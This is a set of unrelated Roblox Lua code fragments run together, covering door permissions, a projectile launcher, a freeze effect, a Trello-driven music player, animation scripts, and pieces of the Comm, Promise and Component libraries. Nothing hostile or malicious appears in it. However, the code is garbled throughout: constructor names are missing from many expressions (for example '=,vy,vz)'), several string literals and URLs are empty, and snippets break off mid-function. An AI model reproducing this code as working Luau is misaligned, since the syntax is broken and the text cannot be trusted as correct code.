function checkOkToLetIn(name) for i = 1,#permission do if (string.upper(name) == string.upper(permission[i])) then return true end end return false end local Door = script.Parent function onTouched(hit) print("Door Hit") local human = hit.Parent:findFirstChild("Humanoid") if (human ~= nil ) then if human.Parent.Torso.roblox.Texture == texture then Door.Transparency = 0.7 Door.CanCollide = false wait(2) Door.CanCollide = true Door.Transparency = 0 print("Human touched door") elseif (checkOkToLetIn(human.Parent.Name)) then print("Human passed test") Door.Transparency = 0.7 Door.CanCollide = false wait(2) Door.CanCollide = true Door.Transparency = 0 else human.Health = 0 end end end script.Parent.Touched:connect(onTouched)
-- find player's head pos
local vCharacter = Tool.Parent local vPlayer = game.Players:playerFromCharacter(vCharacter) --local head = vCharacter:findFirstChild("Head") local head = locateHead() if head == nil then return end --computes a the intended direction of the projectile based on where the mouse was clicked in reference to the head local dir = mouse_pos - head.Position dir = computeDirection(dir) local launch = head.Position + 3 * dir local delta = mouse_pos - launch local dy = delta.y local new_delta =, 0, delta.z) delta = new_delta local dx = delta.magnitude local unit_delta = delta.unit -- acceleration due to gravity in RBX units local g = (-9.81 * 20) local theta = computeLaunchAngle( dx, dy, g) local vy = math.sin(theta) local xz = math.cos(theta) local vx = unit_delta.x * xz local vz = unit_delta.z * xz local missile = Pellet:clone() missile.Position = launch missile.Velocity =,vy,vz) * VELOCITY missile.PelletScript.Disabled = false local creator_tag ="ObjectValue") creator_tag.Value = vPlayer creator_tag.Name = "creator" creator_tag.Parent = missile missile.Parent = game.Workspace end function locateHead() local vCharacter = Tool.Parent local vPlayer = game.Players:playerFromCharacter(vCharacter) return vCharacter:findFirstChild("Head") end function computeLaunchAngle(dx,dy,grav) -- arcane -- local g = math.abs(grav) local inRoot = (VELOCITY*VELOCITY*VELOCITY*VELOCITY) - (g * ((g*dx*dx) + (2*dy*VELOCITY*VELOCITY))) if inRoot <= 0 then return .25 * math.pi end local root = math.sqrt(inRoot) local inATan1 = ((VELOCITY*VELOCITY) + root) / (g*dx) local inATan2 = ((VELOCITY*VELOCITY) - root) / (g*dx) local answer1 = math.atan(inATan1) local answer2 = math.atan(inATan2) if answer1 < answer2 then return answer1 end return answer2 end function computeDirection(vec) local lenSquared = vec.magnitude * vec.magnitude local invSqrt = 1 / math.sqrt(lenSquared) return * invSqrt, vec.y * invSqrt, vec.z * invSqrt) end Tool.Enabled = true function onActivated() if not Tool.Enabled then return end Tool.GripPos =,-0.5,0.5) Tool.Enabled = false local character = Tool.Parent; local humanoid = character.Humanoid if humanoid == nil then print("Humanoid not found") return end local targetPos = humanoid.TargetPoint fire(targetPos) wait(0.5) Tool.GripPos =,0,0.5) wait(FIRERATE - 0.5) Tool.Enabled = true end script.Parent.Activated:connect(onActivated)
-- Pages --
local myaccpage = script.Parent.Parent.HolderFrame.Accounts local deppage = script.Parent.Parent.HolderFrame.Deposit local wthpage = script.Parent.Parent.HolderFrame.Withdraw local trnpage = script.Parent.Parent.HolderFrame.Transfer local cshpage = script.Parent.Parent.HolderFrame.BuyCash
--freeze the character
DisableMove() IceForm ="Sound") IceForm.Name = "IceForm" IceForm.SoundId = "rbxassetid://"..formSounds[math.random(1,#formSounds)] IceForm.Parent = Head IceForm.PlaybackSpeed = 1 IceForm.Volume = 1.5 game.Debris:AddItem(IceForm, 10) delay(0, function() IceForm:Play() end) for i = 1, #charParts do local newIcePart = icePart:Clone() --newIcePart.IceMesh.Scale = newIcePart.IceMesh.Scale * charParts[i].Size newIcePart.Size =[i].Size.x+.1, charParts[i].Size.y+.1, charParts[i].Size.z+.1) newIcePart.CFrame = charParts[i].CFrame newIcePart.Parent = character local Weld ="Weld") Weld.Part0 = charParts[i] Weld.Part1 = newIcePart Weld.C0 = charParts[i].CFrame:inverse() Weld.C1 = newIcePart.CFrame:inverse() Weld.Parent = newIcePart table.insert(iceParts, newIcePart) end for i = 1, #accessoryParts do local newIcePart2 = accessoryParts[i]:Clone() newIcePart2.Name = "IcePart" newIcePart2.formFactor = "Custom" newIcePart2.Color = Color3.fromRGB(128, 187, 219) newIcePart2.CanCollide = false newIcePart2.Anchored = false newIcePart2.Transparency = .5 newIcePart2.BottomSurface = "Smooth" newIcePart2.TopSurface = "Smooth" newIcePart2.Material = Enum.Material.SmoothPlastic newIcePart2.Mesh.TextureId = "" newIcePart2.Mesh.Scale =, newIcePart2.Mesh.Scale.y+.1, newIcePart2.Mesh.Scale.z+.1) newIcePart2.CFrame = accessoryParts[i].CFrame newIcePart2.Parent = character local Weld2 ="Weld") Weld2.Part0 = accessoryParts[i] Weld2.Part1 = newIcePart2 Weld2.C0 = accessoryParts[i].CFrame:inverse() Weld2.C1 = newIcePart2.CFrame:inverse() Weld2.Parent = newIcePart2 table.insert(iceParts2, newIcePart2) end wait(script.Duration.Value)
-- In radian the maximum accuracy penalty
local MaxSpread = 0.01
-- do not touch anything below or I will cry ~Wiz --
local nowplaying = "" local requests = { } local http = game:GetService('HttpService') local lists = http:JSONDecode(http:GetAsync(""..trelloboard.."/lists")) for _,v in pairs(lists) do if == "Rap" then local items = http:JSONDecode(http:GetAsync("""/cards")) print(#items) for _,v in pairs(items) do if":") ~= nil then local s,f = string.find(,":") table.insert(songs, string.sub(,f+1)) end end end end function shuffleTable(t) math.randomseed(tick()) assert(t, "shuffleTable() expected a table, got nil" ) local iterations = #t local j for i = iterations, 2, -1 do j = math.random(i) t[i], t[j] = t[j], t[i] end end shuffleTable(songs) local songnum = 0 function script.Parent.musicEvents.getSong.OnServerInvoke() return game:service('MarketplaceService'):GetProductInfo(tonumber(nowplaying)).Name end script.Parent.musicEvents.purchaseSong.OnServerEvent:connect(function(p) if p.userId > 0 then game:GetService("MarketplaceService"):PromptProductPurchase(p, productId) end end) local votes = { } function makesong() script.Parent.Parent.Parent.Body.MP:WaitForChild("Sound"):Stop() wait() if #requests == 0 then songnum = songnum+1 if songnum > #songs then songnum = 1 end nowplaying = songs[songnum] else nowplaying = requests[1] table.remove(requests,1) end local thisfunctionssong = nowplaying script.Parent.Parent.Parent.Body.MP.Sound.SoundId = "rbxassetid://"..thisfunctionssong wait() script.Parent.Parent.Parent.Body.MP.Sound:Play() script.Parent.musicEvents.newSong:FireAllClients(game:service('MarketplaceService'):GetProductInfo(tonumber(nowplaying)).Name) votes = {} wait(script.Parent.Parent.Parent.Body.MP.Sound.TimeLength) if "rbxassetid://"..nowplaying == "rbxassetid://"..thisfunctionssong then makesong() end end function countVotes() local c = 0 for _,v in pairs(votes) do if v[2] == true then c = c +1 end end local remainder = #game.Players:GetPlayers() - #votes local percent = (c + (remainder/2))/#game.Players:GetPlayers() script.Parent.musicEvents.voteChange:FireAllClients(percent) if percent <= 0.2 then --skip song makesong() end return end script.Parent.musicEvents.voteYes.OnServerEvent:connect(function(p) for _,v in pairs(votes) do if v[1] == p.Name then v[2] = true countVotes() return end end table.insert(votes, {p.Name, true}) countVotes() end) script.Parent.musicEvents.voteNo.OnServerEvent:connect(function(p) for _,v in pairs(votes) do if v[1] == p.Name then v[2] = false countVotes() return end end table.insert(votes, {p.Name, false}) countVotes() end)
--[[ AnimateKey(note1,px,py,pz,ox,oy,oz,Time) --note1(1-61), position x, position y, position z, orientation x, orientation y, orientation z, time local obj = --object or gui or wahtever goes here local Properties = {} Properties.Size = Tween(obj,Properties,2,true,Enum.EasingStyle.Linear,Enum.EasingDirection.Out,0,false) --Obj,Property,Time,wait,Easingstyle,EasingDirection,RepeatAmt,Reverse ]]
function HighlightPianoKey(note1,transpose) if not Settings.KeyAesthetics then return end local octave = math.ceil(note1/12) local note2 = (note1 - 1)%12 + 1 local min = -15 local max = 15 --These are for the distances local goal = Piano.Case.Goal local snow = Piano.Case.Snow local cln = snow:clone() cln.Parent = Piano.Keys.Snow cln.Transparency = 0 cln.Position = + math.random(min,max),cln.Position.y,cln.Position.z + math.random(min,max)) local obj = cln local Properties = {} Properties.Position =,goal.Position.y,cln.Position.z) Tween(obj,Properties,2,true,Enum.EasingStyle.Linear,Enum.EasingDirection.Out,0,false) cln:Destroy() end
--[=[ @param name string @param inboundMiddleware ClientMiddleware? @param outboundMiddleware ClientMiddleware? @return (...: any) -> any Generates a function on the matching RemoteFunction generated with ServerComm. The function can then be called to invoke the server. If this `ClientComm` object was created with the `usePromise` parameter set to `true`, then this generated function will return a Promise when called. ```lua -- Server-side: local serverComm = serverComm:BindFunction("MyFunction", function(player, msg) return msg:upper() end) -- Client-side: local clientComm = local myFunc = clientComm:GetFunction("MyFunction") local uppercase = myFunc("hello world") print(uppercase) --> HELLO WORLD -- Client-side, using promises: local clientComm =, true) local myFunc = clientComm:GetFunction("MyFunction") myFunc("hi there"):andThen(function(msg) print(msg) --> HI THERE end):catch(function(err) print("Error:", err) end) ``` ]=]
function ClientComm:GetFunction(name: string, inboundMiddleware: ClientMiddleware?, outboundMiddleware: ClientMiddleware?) return Comm.Client.GetFunction(self._instancesFolder, name, self._usePromise, inboundMiddleware, outboundMiddleware) end
-- Adding an arc to the running system
function System.add(arc) if not arcInstances[arc] then arcInstances[arc] = true numInstances = numInstances + 1 arc.segmentsFolder.Parent = MainFolder arc.part.Parent = MainPartFolder if arc.dynamic then dynamicInstances[arc] = true end updateConnection() end end function System.contains(arc) return arcInstances[arc] ~= nil end
--[[ CameraUtils - Math utility functions shared by multiple camera scripts 2018 Camera Update - AllYourBlox --]]
local Players = game:GetService("Players") local UserInputService = game:GetService("UserInputService") local UserGameSettings = UserSettings():GetService("UserGameSettings") local CameraUtils = {} local function round(num: number) return math.floor(num + 0.5) end
-- ROBLOX deviation: color formatting omitted
local DEFAULT_OPTIONS = { callToJSON = true, -- ROBLOX deviation: using Object.None instead of nil because assigning nil is no different from not assigning value at all compareKeys = Object.None, escapeRegex = false, escapeString = true, highlight = false, indent = 2, maxDepth = math.huge, min = false, plugins = {}, printBasicPrototype = true, printFunctionName = true, -- ROBLOX deviation: color formatting omitted theme = nil, } local function validateOptions(options: OptionsReceived) for k, _ in pairs(options) do if DEFAULT_OPTIONS[k] == nil then error(Error(string.format('pretty-format: Unknown option "%s".', tostring(k)))) end end if options.min and options.indent ~= nil and options.indent ~= 0 then error(Error('pretty-format: Options "min" and "indent" cannot be used together.')) end -- ROBLOX deviation: color formatting omitted end
------------------ ------------------
function onDied() pose = "Dead" model:remove() end function waitForChild(parent, childName) while true do local child = parent:findFirstChild(childName) if child then return child end parent.ChildAdded:wait() end end local Figure = script.Parent local Torso = waitForChild(Figure, "Torso") local RightShoulder = waitForChild(Torso, "Right Shoulder") local LeftShoulder = waitForChild(Torso, "Left Shoulder") local RightHip = waitForChild(Torso, "Right Hip") local LeftHip = waitForChild(Torso, "Left Hip") local Neck = waitForChild(Torso, "Neck") local Humanoid = waitForChild(Figure, "Zombie") local pose = "Standing" local toolAnim = "None" local toolAnimTime = 0 local isSeated = false function onRunning(speed) if isSeated then return end if speed>0 then pose = "Running" else pose = "Standing" end end function onJumping() isSeated = false pose = "Jumping" end function onClimbing() pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() pose = "FreeFall" end function onDancing() pose = "Dancing" end function onFallingDown() pose = "FallingDown" end function onSeated() isSeated = true pose = "Seated" end function moveJump() RightShoulder.MaxVelocity = 1 LeftShoulder.MaxVelocity = 1 RightShoulder.DesiredAngle = -3.14 LeftShoulder.DesiredAngle = -3.14 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 0 end function moveFreeFall() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = -1 LeftShoulder.DesiredAngle = -1 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 0 end function moveFloat() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = -1.57 LeftShoulder.DesiredAngle = 1.57 RightHip.DesiredAngle = 1.57 LeftHip.DesiredAngle = -1.57 end function moveBoogy() while pose=="Boogy" do wait(.5) RightShoulder.MaxVelocity = 1 LeftShoulder.MaxVelocity = 1 RightShoulder.DesiredAngle = -3.14 LeftShoulder.DesiredAngle = 0 RightHip.DesiredAngle = 1.57 LeftHip.DesiredAngle = 0 wait(.5) RightShoulder.MaxVelocity = 1 LeftShoulder.MaxVelocity = 1 RightShoulder.DesiredAngle = 0 LeftShoulder.DesiredAngle = -3.14 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 1.57 end end function moveZombie() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = -1.57 LeftShoulder.DesiredAngle = 1.57 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 0 end function movePunch() script.Parent.Torso.Anchored=true RightShoulder.MaxVelocity = 60 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = -1.57 LeftShoulder.DesiredAngle = 0 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 0 wait(1) script.Parent.Torso.Anchored=false pose="Standing" end function moveKick() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = 0 LeftShoulder.DesiredAngle = 0 RightHip.MaxVelocity = 40 RightHip.DesiredAngle = 1.57 LeftHip.DesiredAngle = 0 wait(1) pose="Standing" end function moveFly() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = 0 LeftShoulder.DesiredAngle = 0 RightHip.MaxVelocity = 40 RightHip.DesiredAngle = 1.57 LeftHip.DesiredAngle = 0 wait(1) pose="Standing" end function moveClimb() RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = -3.14 LeftShoulder.DesiredAngle = 3.14 RightHip.DesiredAngle = 0 LeftHip.DesiredAngle = 0 end function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder.DesiredAngle = -3.14 /2 LeftShoulder.DesiredAngle = -3.14 /2 RightHip.DesiredAngle = 3.14 /2 LeftHip.DesiredAngle = -3.14 /2 end function getTool() kidTable = Figure:children() if (kidTable ~= nil) then numKids = #kidTable for i=1,numKids do if (kidTable[i].className == "Tool") then return kidTable[i] end end end return nil end function getToolAnim(tool) c = tool:children() for i=1,#c do if (c[i].Name == "toolanim" and c[i].className == "StringValue") then return c[i] end end return nil end function animateTool() if (toolAnim == "None") then RightShoulder.DesiredAngle = -1.57 return end if (toolAnim == "Slash") then RightShoulder.MaxVelocity = 0.5 RightShoulder.DesiredAngle = 0 return end if (toolAnim == "Lunge") then RightShoulder.MaxVelocity = 0.5 LeftShoulder.MaxVelocity = 0.5 RightHip.MaxVelocity = 0.5 LeftHip.MaxVelocity = 0.5 RightShoulder.DesiredAngle = -1.57 LeftShoulder.DesiredAngle = 1.0 RightHip.DesiredAngle = 1.57 LeftHip.DesiredAngle = 1.0 return end end function move(time) local amplitude local frequency if (pose == "Jumping") then moveJump() return end if (pose == "Zombie") then moveZombie() return end if (pose == "Boogy") then moveBoogy() return end if (pose == "Float") then moveFloat() return end if (pose == "Punch") then movePunch() return end if (pose == "Kick") then moveKick() return end if (pose == "Fly") then moveFly() return end if (pose == "FreeFall") then moveFreeFall() return end if (pose == "Climbing") then moveClimb() return end if (pose == "Seated") then moveSit() return end amplitude = 0.1 frequency = 1 RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 if (pose == "Running") then amplitude = 1 frequency = 9 elseif (pose == "Dancing") then amplitude = 2 frequency = 16 end desiredAngle = amplitude * math.sin(time*frequency) if pose~="Dancing" then RightShoulder.DesiredAngle = -desiredAngle LeftShoulder.DesiredAngle = desiredAngle RightHip.DesiredAngle = -desiredAngle LeftHip.DesiredAngle = -desiredAngle else RightShoulder.DesiredAngle = desiredAngle LeftShoulder.DesiredAngle = desiredAngle RightHip.DesiredAngle = -desiredAngle LeftHip.DesiredAngle = -desiredAngle end local tool = getTool() if tool ~= nil then animStringValueObject = getToolAnim(tool) if animStringValueObject ~= nil then toolAnim = animStringValueObject.Value -- message recieved, delete StringValue animStringValueObject.Parent = nil toolAnimTime = time + .3 end if time > toolAnimTime then toolAnimTime = 0 toolAnim = "None" end animateTool() else toolAnim = "None" toolAnimTime = 0 end end
--[=[ Ends the observable with these values before cancellation @param values { T } @return (source: Observable) -> Observable ]=]
function Rx.endWith(values) return function(source) assert(Observable.isObservable(source), "Bad observable") return local maid = maid:GiveTask(source:Subscribe( function(...) sub:Fire(...) end, function(...) for _, item in pairs(values) do sub:Fire(item) end sub:Fail(...) end), function() for _, item in pairs(values) do sub:Fire(item) end sub:Complete() end) return maid end) end end
--]] Put in StarterPlayer > StarterCharacterScripts
local players = game:GetService("Players") local hrp = players.LocalPlayer.Character:WaitForChild("HumanoidRootPart") hrp.Died.Volume = 0
-- -- Verify that everything is where it should be
assert(Self:FindFirstChild'Humanoid' ~= nil, 'Monster does not have a humanoid') assert(Settings ~= nil, 'Monster does not have a Configurations object') assert(Settings:FindFirstChild'MaximumDetectionDistance' ~= nil and Settings.MaximumDetectionDistance:IsA'NumberValue', 'Monster does not have a MaximumDetectionDistance (NumberValue) setting') assert(Settings:FindFirstChild'CanGiveUp' ~= nil and Settings.CanGiveUp:IsA'BoolValue', 'Monster does not have a CanGiveUp (BoolValue) setting') assert(Settings:FindFirstChild'CanRespawn' ~= nil and Settings.CanRespawn:IsA'BoolValue', 'Monster does not have a CanRespawn (BoolValue) setting') assert(Settings:FindFirstChild'SpawnPoint' ~= nil and Settings.SpawnPoint:IsA'Vector3Value', 'Monster does not have a SpawnPoint (Vector3Value) setting') assert(Settings:FindFirstChild'AutoDetectSpawnPoint' ~= nil and Settings.AutoDetectSpawnPoint:IsA'BoolValue', 'Monster does not have a AutoDetectSpawnPoint (BoolValue) setting') assert(Settings:FindFirstChild'FriendlyTeam' ~= nil and Settings.FriendlyTeam:IsA'BrickColorValue', 'Monster does not have a FriendlyTeam (BrickColorValue) setting') assert(Settings:FindFirstChild'AttackDamage' ~= nil and Settings.AttackDamage:IsA'NumberValue', 'Monster does not have a AttackDamage (NumberValue) setting') assert(Settings:FindFirstChild'AttackFrequency' ~= nil and Settings.AttackFrequency:IsA'NumberValue', 'Monster does not have a AttackFrequency (NumberValue) setting') assert(Settings:FindFirstChild'AttackRange' ~= nil and Settings.AttackRange:IsA'NumberValue', 'Monster does not have a AttackRange (NumberValue) setting') assert(Mind ~= nil, 'Monster does not have a Mind object') assert(Mind:FindFirstChild'CurrentTargetHumanoid' ~= nil and Mind.CurrentTargetHumanoid:IsA'ObjectValue', 'Monster does not have a CurrentTargetHumanoid (ObjectValue) mind setting') assert(Self:FindFirstChild'Died' and Self.Died:IsA'BindableEvent', 'Monster does not have a Died BindableEvent') assert(Self:FindFirstChild'Respawned' and Self.Died:IsA'BindableEvent', 'Monster does not have a Respawned BindableEvent') assert(Self:FindFirstChild'Attacked' and Self.Died:IsA'BindableEvent', 'Monster does not have a Attacked BindableEvent') assert(script:FindFirstChild'Attack' and script.Attack:IsA'Animation', 'Monster does not have a MonsterScript.Attack Animation')
Event.Hitbox.Touched:Connect(function(hit) if hit.Parent:IsA("Tool") and hit.Parent.Name == ToolRequired then if game.ReplicatedStorage.ItemSwitching.Value == true then hit.Parent:Destroy() end Event.LocksLeft.Value = Event.LocksLeft.Value - 1 Event.Dinosaur.Transparency = 0 Event.TeleportEffectPad.Insert:Play() Event.Hitbox.DinosaurHint:Destroy() script.Disabled = true end end) Event.Hitbox.ClickDetector.MouseClick:Connect(function(plr) if plr.Backpack:FindFirstChild(ToolRequired) then if game.ReplicatedStorage.ItemSwitching.Value == true then plr.Backpack:FindFirstChild(ToolRequired):Destroy() end Event.LocksLeft.Value = Event.LocksLeft.Value - 1 Event.Dinosaur.Transparency = 0 Event.TeleportEffectPad.Insert:Play() Event.Hitbox.DinosaurHint:Destroy() script.Disabled = true end end)
--[=[ @class Component Bind components to Roblox instances using the Component class and CollectionService tags. To avoid confusion of terms: - `Component` refers to this module. - `Component Class` (e.g. `MyComponent` through this documentation) refers to a class created via `` - `Component Instance` refers to an instance of a component class. - `Roblox Instance` refers to the Roblox instance to which the component instance is bound. Methods and properties are tagged with the above terms to help clarify the level at which they are used. ]=]
local Component = {} Component.__index = Component
--[[ Yield until the promise is completed. This matches the execution model of normal Roblox functions. ]]
function Promise.prototype:awaitStatus() self._unhandledRejection = false if self._status == Promise.Status.Started then local bindable ="BindableEvent") self:finally(function() bindable:Fire() end) bindable.Event:Wait() bindable:Destroy() end if self._status == Promise.Status.Resolved then return self._status, unpack(self._values, 1, self._valuesLength) elseif self._status == Promise.Status.Rejected then return self._status, unpack(self._values, 1, self._valuesLength) end return self._status end Promise.prototype.AwaitStatus = Promise.prototype.awaitStatus local function awaitHelper(status, ...) return status == Promise.Status.Resolved, ... end